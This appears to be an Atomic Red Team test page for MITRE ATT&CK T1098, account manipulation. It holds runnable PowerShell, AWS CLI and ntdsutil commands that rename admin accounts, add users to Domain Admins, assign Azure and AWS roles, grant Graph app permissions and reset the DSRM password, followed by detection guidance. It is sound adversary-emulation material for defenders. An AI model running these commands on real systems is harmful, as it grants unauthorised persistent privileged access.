# T1098 - Account Manipulation
Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. 

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).

## Atomic Tests

### Atomic Test #1 - Admin Account Manipulate
Manipulate Admin Account Name

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`
```powershell
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
$w = Get-Random -Minimum 2 -Maximum 9999
Write-Host HaHa_$x$y$z

$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name

foreach($member in $fmm) {
    if($member -like "*Administrator*") {
        $account = $member.Name -replace ".+\\\","" # strip computername\
        $originalDescription = (Get-LocalUser -Name $account).Description
        Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description
        Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation
        Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME
        }
    }
```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 1

### Atomic Test #2 - Domain Account and Group Manipulate
Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). 

The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to 
create the user and alter the group. Automatic installation of the dependency requires an elevated session, 
and is unlikely to work with Powershell Core (untested).

If you consider running this test against a production Active Directory, the good practise is to create a dedicated
service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
as group manager of the target group.

Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`

**Supported Platforms:** windows
#### Dependencies:  Run with `None`!
##### Description: PS Module ActiveDirectory

##### Check Prereq Commands:
```None
Try {
    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
    exit 0
} 
Catch {
    exit 1
}

```
##### Get Prereq Commands:
```None
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
  Install-WindowsFeature RSAT-AD-PowerShell
}

```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$x = Get-Random -Minimum 2 -Maximum 99
$y = Get-Random -Minimum 2 -Maximum 99
$z = Get-Random -Minimum 2 -Maximum 99
$w = Get-Random -Minimum 2 -Maximum 99

Import-Module ActiveDirectory
$account = "atr--$x$y$z"
New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False 
Add-ADGroupMember "Domain Admins" $account
```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 2

### Atomic Test #3 - AWS - Create a group and add a user to that group
Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss

**Supported Platforms:** iaas:aws
#### Dependencies:  Run with `None`!
##### Description: Check if the user exists, we can only add a user to a group if the user exists.

##### Check Prereq Commands:
```None
aws iam list-users | grep atomicredteam

```
##### Get Prereq Commands:
```None
echo Please run atomic test T1136.003, before running this atomic test

```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
aws iam create-group --group-name atomicredteam
aws iam add-user-to-group --user-name atomicredteam --group-name atomicredteam
```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 3

### Atomic Test #4 - Azure AD - adding user to Azure AD role
The adversaries want to add user to some Azure AD role. Threat actor 
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
Privileged Authentication Administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to the user principal in this test.

The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.

Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type.

**Supported Platforms:** azure-ad
#### Dependencies:  Run with `None`!
##### Description: AzureAD module must be installed.

##### Check Prereq Commands:
```None
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```None
Install-Module -Name AzureAD -Force

```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "p4sswd" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "jonh@contoso.com", $Pword
Connect-AzureAD -Credential $Credential

$user = Get-AzureADUser | where-object {$_.DisplayName -eq "SuperUser"}
if ($user -eq $null) { Write-Warning "User not found"; exit }
$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "Global Reader"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 4

### Atomic Test #5 - Azure AD - adding service principal to Azure AD role
The adversaries want to add service principal to some Azure AD role. Threat actor 
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
Privileged Authentication Administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to service principal in this test.

The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.

Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.

**Supported Platforms:** azure-ad
#### Dependencies:  Run with `None`!
##### Description: AzureAD module must be installed.

##### Check Prereq Commands:
```None
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```None
Install-Module -Name AzureAD -Force

```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "p4sswd" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "jonh@contoso.com", $Pword
Connect-AzureAD -Credential $Credential

$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "SuperSP"}
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "Global Reader"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 5

### Atomic Test #6 - Azure - adding user to Azure role in subscription
The adversaries want to add user to some Azure role, also called Azure resource role. Threat actor 
may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
By default, the role Reader is assigned to user in this test.

New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.

The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
and Microsoft Graph Directory.Read.All permissions.

Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.

**Supported Platforms:** iaas:azure
#### Dependencies:  Run with `None`!
##### Description: Az.Resources module must be installed.

##### Check Prereq Commands:
```None
try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```None
Install-Module -Name Az.Resources -Force

```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module -Name Az.Resources
$PWord = ConvertTo-SecureString -String "p4sswd" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "jonh@contoso.com", $Pword
Connect-AzAccount -Credential $Credential

$user = Get-AzADUser | where-object {$_.DisplayName -eq "SuperUser"}
if ($user -eq $null) { Write-Warning "User not found"; exit }
$subscription = Get-AzSubscription | where-object {$_.Name -eq "Azure subscription 1"}
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | where-object {$_.Name -eq "Reader"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }

New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 6

### Atomic Test #7 - Azure - adding service principal to Azure role in subscription
The adversaries want to add service principal to some Azure role, also called Azure resource role. Threat actor 
may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
By default, the role Reader is assigned to service principal in this test.

New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.

The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
and Microsoft Graph Directory.Read.All permissions.

Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.

**Supported Platforms:** iaas:azure
#### Dependencies:  Run with `None`!
##### Description: Az.Resources module must be installed.

##### Check Prereq Commands:
```None
try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```None
Install-Module -Name Az.Resources -Force

```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module -Name Az.Resources
$PWord = ConvertTo-SecureString -String "p4sswd" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "jonh@contoso.com", $Pword
Connect-AzAccount -Credential $Credential

$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "SuperSP"}
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$subscription = Get-AzSubscription | where-object {$_.Name -eq "Azure subscription 1"} 
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | where-object {$_.Name -eq "Reader"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }

New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 7

### Atomic Test #8 - Azure AD - adding permission to application
The adversaries want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
You can use Get-AzureADApplication instead of New-AzureADServicePrincipal to use an existing application.
The DirectoryRecommendations.Read.All permissions have been selected as the default

The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.

Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
You can also take a look at the materials:
https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
https://github.com/reprise99/Sentinel-Queries
https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb

**Supported Platforms:** azure-ad
#### Dependencies:  Run with `None`!
##### Description: AzureAD module must be installed.

##### Check Prereq Commands:
```None
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```None
Install-Module -Name AzureAD -Force

```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "p4sswd" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "jonh@contoso.com", $Pword
Connect-AzureAD -Credential $Credential

$aadApplication = New-AzureADApplication -DisplayName "test_app"
$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId
#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "test_app"}

#Get Service Principal of Microsoft Graph Resource API 
$graphSP =  Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"}

#Initialize RequiredResourceAccess for Microsoft Graph Resource API 
$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess
$requiredGraphAccess.ResourceAppId = $graphSP.AppId
$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]

#Set Application Permissions
$ApplicationPermissions = @('DirectoryRecommendations.Read.All')

$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}
if($reqPermission)
{
$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess
$resourceAccess.Type = "Role"
$resourceAccess.Id = $reqPermission.Id    
#Add required app permission
$requiredGraphAccess.ResourceAccess.Add($resourceAccess)
}
else
{
Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red
}

#Add required resource accesses
$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]
$requiredResourcesAccess.Add($requiredGraphAccess)

#Set permissions in existing Azure AD App
Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess

$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}

New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id
```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 8

### Atomic Test #9 - Password Change on Directory Service Restore Mode (DSRM) Account
Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
ntdsutil "set dsrm password" "sync from domain account %username%" "q" "q"
```

In [ ]:
Invoke-AtomicTest T1098 -TestNumbers 9

## Detection
Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)

Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.

Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078)

## Shield Active Defense
### System Activity Monitoring 
 Collect system activity logs which can reveal adversary activity. 

 Capturing system logs can show logins, user and system events, etc.  Collecting this data and potentially sending it to a centralized location can help reveal the presence of an adversary and the actions they perform on a compromised system.
#### Opportunity
There is an opportunity to create a detection with a moderately high probability of success.
#### Use Case
A defender can implement monitoring to alert if a user account is altered outside normal business hours, from remote locations, etc.
#### Procedures
Ensure that systems capture and retain common system level activity artifacts that might be produced.
Monitor Windows systems for event codes that reflect an adversary changing passwords, adding accounts to groups, etc.